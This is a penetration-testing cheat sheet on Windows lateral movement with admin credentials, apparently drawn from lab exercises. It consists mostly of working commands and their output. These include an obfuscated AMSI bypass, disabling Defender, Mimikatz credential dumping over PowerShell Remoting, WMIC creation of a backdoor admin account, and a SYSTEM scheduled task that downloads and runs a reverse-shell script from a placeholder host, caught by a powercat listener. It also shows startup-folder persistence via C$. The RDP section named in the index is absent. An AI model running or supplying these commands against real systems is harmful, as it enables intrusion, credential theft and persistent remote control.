
========================================================================================================================
Lateral movement using native commands (WMIC, PowerShell Remoting, Schtasks, Remote File Access, RDP) 
========================================================================================================================

Requirement: 
> You need valid admin credentials on the remote Windows server or workstation

Index
======
1. Powershell Remoting
2. WMIC
3. Scheduled task (native command 'schtasks') + Powershell reverse shell
4. Remote file access 
5. RDP


========================================================================================================================
Example 1 - Powershell Remoting
========================================================================================================================

1. Interactive PowerShell remote console using kerberos authentication (current session)
--------------------------------------------------------------------------------------------

PS C:\Users\pentester> hostname
Laptop1

PS C:\Users\pentester> whoami
security-lab\pentester

PS C:\Users\pentester> Enter-PSSession -Computername TEMP-DC.Security-Test-Lab.Local

[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\pentester\Documents> hostname
TEMP-DC

[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\pentester\Documents> whoami
security-lab\pentester

[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\pentester\Documents> exit


2. Interactive PowerShell remote console using credentials
------------------------------------------------------------

PS C:\Users\pentester> hostname
Laptop1

PS C:\Users\pentester> whoami
security-lab\pentester

PS C:\Users\pentester> Enter-PSSession -Computername TEMP-DC.Security-Test-Lab.Local -Credential security-lab\auditor

[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\auditor\Documents> hostname
TEMP-DC

PS C:\Users\pentester> whoami
security-lab\auditor

[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\auditor\Documents> dir
Volume in drive C has no label.
Volume Serial Number is C022-C9A0
Directory of C:\
<SNIP>

[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\auditor\Documents> exit


3. Load and execute a PowerShell script in an existing PowerShell remoting session
------------------------------------------------------------------------------------

PS C:\AD\Tools> $sess = New-PSSession -ComputerName lab-dc.company.local -Credential company\admin

PS C:\AD\Tools> Enter-PSSession -Session $sess

[lab-dc.company.local]: PS C:\Users\admin\Documents> Set-MpPreference -DisableRealtimeMonitoring $true

[lab-dc.company.local]: PS C:\Users\admin\Documents> sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'
 ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    
 [lab-dc.company.local]: PS C:\Users\admin\Documents> (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

[lab-dc.company.local]: PS C:\Users\admin\Documents> exit

PS C:\AD\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

PS C:\AD\AD\Tools>  Enter-PSSession -Session $sess

[lab-dc.company.local]: PS C:\Users\admin\Documents> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords" "exit"'

  .#####.   mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

<SNIP>

3. Non-Interactive PowerShell remote OS command execution
---------------------------------------------------------

PS C:\AD\jfc-tools\x64> Invoke-Command -ScriptBlock{hostname;whoami} -computername TEMP-DC -Credential security-lab\auditor
TEMP-DC
security-lab\auditor

PS C:\AD\jfc-tools\x64> Invoke-Command -ScriptBlock{hostname;whoami} -computername TEMP-DC
TEMP-DC
security-lab\pentester

PS C:\AD\jfc-tools\x64> Invoke-command -Scriptblock {qwinsta} -ComputerName (get-content c:\path\list-servers.txt) -Credential security-lab\pentester
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
>console           Administrator             1  Active
 7a78855482a04...                        65536  Listen
 rdp-tcp                                 65537  Listen
<SNIP>

PS C:\AD\jfc-tools\x64> Invoke-command -Filepath C:\AD\Tools\evil.ps1 -ComputerName (get-content c:\path\list-servers.txt) -Credential security-lab\pentester
<SNIP>


========================================================================================================================
Example 2 -  WMIC native commands
========================================================================================================================

Wmic /node:COMPUTER/user:DOMAIN\USER /password:PASSWORD process call create “COMMAND“


C:\> wmic /node:"192.168.13.215" /user:".\administrator" /password:"Test1******" /privileges:ENABLE process call create "cmd.exe /c (echo net user auditor SuP@P@ssW0rd /add > C:\users\administrator\test.bat)"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 340;
        ReturnValue = 0;
};


C:\> wmic /node:"192.168.13.215" /user:".\administrator" /password:"Test1******!" /privileges:ENABLE process call create "cmd.exe /c (echo net localgroup Administrators auditor /add >> C:\users\administrator\test.bat)"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 2412;
        ReturnValue = 0;
};


C:\> wmic /node:"192.168.13.215" /user:".\administrator" /password:"Test1******!" /privileges:ENABLE process call create "cmd.exe /c (C:\users\administrator\test.bat)"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 732;
        ReturnValue = 0;
};


=> On the remote Windows server '192.168.13.215', the 'auditor' account has been created and added to the local admin group:

C:\users\administrators> net user

User accounts for \\Test-server
-------------------------------------------------------------------------------
Administrator            DefaultAccount	     Guest
auditor

The command completed successfully.


C:\users\administrators> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
auditor
The command completed successfully.


========================================================================================================================
Example 3 - Create remotely a scheduled task (command schtasks) + Powershell reverse shell (InvokePowerShellTcp.ps1)
========================================================================================================================

schtasks /create /sc <ScheduleType> /tn <TaskName> /tr <TaskRun> [/s <Computer> [/u [<Domain>\]<User> [/p <Password>]]] [/ru {[<Domain>\]<User> | System}] [/rp <Password>] [/mo <Modifier>] [/d <Day>[,<Day>...] | *] [/m <Month>[,<Month>...]] [/i <IdleTime>] [/st <StartTime>] [/ri <Interval>] [{/et <EndTime> | /du <Duration>} [/k]] [/sd <StartDate>] [/ed <EndDate>] [/it] [/z] [/f]
/sc <ScheduleType>               : Specifies the schedule type. Valid values are MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE.
/tn <TaskName>                   : Specifies a name for the task.
/tr <TaskRun>                    : Specifies the program or command that the task runs. Type the fully qualified path and file name of an executable file, script file, or batch file. If you omit the path, schtasks assumes that the file is in the SystemRoot\System32 directory.
/s <Computer>                    : Schedules a task on the specified remote computer. Type the name or IP address of a remote computer (with or without backslashes). The default is the local computer.
/u [<Domain>\]<User>             : Runs this command with the permissions of the specified user account. The default is the permissions of the current user of the local computer.
/p <Password>                    : Provides the password for the user account specified in the /u parameter. If you use the /u parameter, but omit the /p parameter or the password argument, schtasks prompts you for a password and obscures the text you type
/ru {[<Domain>\]<User> | System} : Runs the task with permissions of the specified user account. By default, the task runs with the permissions of the current user of the local computer, or with the permission of the user specified by the /u parameter, if one is included. The /ru parameter is valid when scheduling tasks on local or remote computers.
/rp <Password>                   : Provides the password for the user account that is specified in the /ru parameter. If you omit this parameter when specifying a user account, SchTasks.exe prompts you for the password and obscures the text you type. Do not use the /rp parameter for tasks run with System account credentials (/ru System). The System account does not have a password and SchTasks.exe does not prompt for one.


C:\AD\jfc-tools\x64>schtasks /create /S win-server01.security-Test-Lab.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "testuser" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://X.X.X.X/InvokePowerShellTcp2.ps1''')'"
SUCCESS: The scheduled task "testuser" has successfully been created.

C:\AD\jfc-tools\x64>schtasks /Run /S win-server01.security-Test-Lab.local /TN "testuser"
SUCCESS: Attempted to run the scheduled task "testuser".


Other: schtasks /query /S win-server01.security-Test-Lab.local

-----------------------

C:\AD\jfc-tools>python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
172.16.1.1 - - [02/Sep/2020 11:40:37] code 404, message File not found
172.16.1.1 - - [02/Sep/2020 11:40:37] "GET /InvokePowerShellTcp2.ps1 HTTP/1.1" 404 -
172.16.1.1 - - [02/Sep/2020 11:41:42] "GET /InvokePowerShellTcp2.ps1 HTTP/1.1" 200 -

-----------------------

C:\Windows\system32>powershell -nop -ep bypass
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> cd C:\AD\jfc-tools\
PS C:\AD\jfc-tools> . .\powercat.ps1
PS C:\AD\jfc-tools> .\powercat.ps1 -l -p 443 -v -t 1000
PS C:\AD\jfc-tools> powercat -l -p 443 -v -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [X.X.X.X] port  [tcp] accepted (source port 51843)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between Streams...
Windows PowerShell running as user Win-Server01$ on win-server01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>hostname
win-server01

PS C:\Windows\system32> whoami
nt authority\system

========================================================================================================================
Example 4 - Remote File Access to C$ + Upload of an executable file in the startup folder
========================================================================================================================

We can copy a 'malicious' executable file and drop it in the Startup folder, so that it executes every time a user logs in as a user.
> Startup folder: \\REMOTE-COMPUTER-NAME\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\


Step 1. We start locally a powershell session with an account that has local admin privileges over the remote target Windows server
------------------------------------------------------------------------------------------------------------------------------------

PS C:\Users\Administrator> runas /noprofile /netonly /user:administrator powershell
Enter the password for administrator:
Attempting to start powershell as user "server1\administrator" ...
PS C:\Users\Administrator>


Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> ls \\192.168.1.64\C$\

    Directory: \\192.168.1.64\C$

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        19/10/2021     05:43                inetpub
d-----        22/08/2013     17:52                PerfLogs
d-r---        08/10/2017     21:33                Program Files
d-----        08/10/2017     21:56                Program Files (x86)
d-r---        27/07/2022     10:05                Users
d-----        06/08/2022     19:17                Windows
-a----        25/07/2022     09:57              0 SYSTEM

PS C:\WINDOWS\system32>


Step 2. We create our 'malicious' executable file (basic PoC/example)
----------------------------------------------------------------------

PS C:\WINDOWS\system32> echo "cmd /c whoami >> C:\Users\Public\Documents\test.txt" > C:\temp\launcher.bat
PS C:\WINDOWS\system32> echo "cmd /c hostname >> C:\Users\Public\Documents\test.txt" >> C:\temp\launcher.bat

=> Then we use the tool 'bat2exe.exe' to covert the batch script 'launcher.bat' into an executable file 'launcher.exe'


Step 3. We copy our 'malicious' executable file into the Startup folder of the remote target Windows server
------------------------------------------------------------------------------------------------------------

PS C:\WINDOWS\system32> xcopy C:\temp\launcher.exe "\\192.168.13.154\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\launcher.exe"
Does \\192.168.13.154\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\launcher.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\temp\launcher.exe
1 File(s) copied


PS C:\WINDOWS\system32> ls "\\192.168.1.64\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"

    Directory: \\192.168.1.64\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        26/08/2022     01:59         129398 launcher.exe


Step 4. Now each time an account will log into the remote target Windows server, the file 'launcher.exe' will be exectuted.
---------------------------------------------------------------------------------------------------------------------------

As a PoC when I logged (RDP) with the accounts 'Administrator' and 'Pentester' on the target Windows server, the executable file 'launcher.exe' was executed .

PS C:\WINDOWS\system32> ls "\\192.168.1.64\C$\Users\Public\Documents"

    Directory: \\192.168.1.64\C$\Users\Public\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        25/08/2022     18:34             72 test.txt


PS C:\WINDOWS\system32> cat "\\192.168.1.64\C$\Users\Public\Documents\test.txt"
temp-sqldb\pentester
TEMP-SQLDB
temp-sqldb\administrator
TEMP-SQLDB

PS C:\WINDOWS\system32>

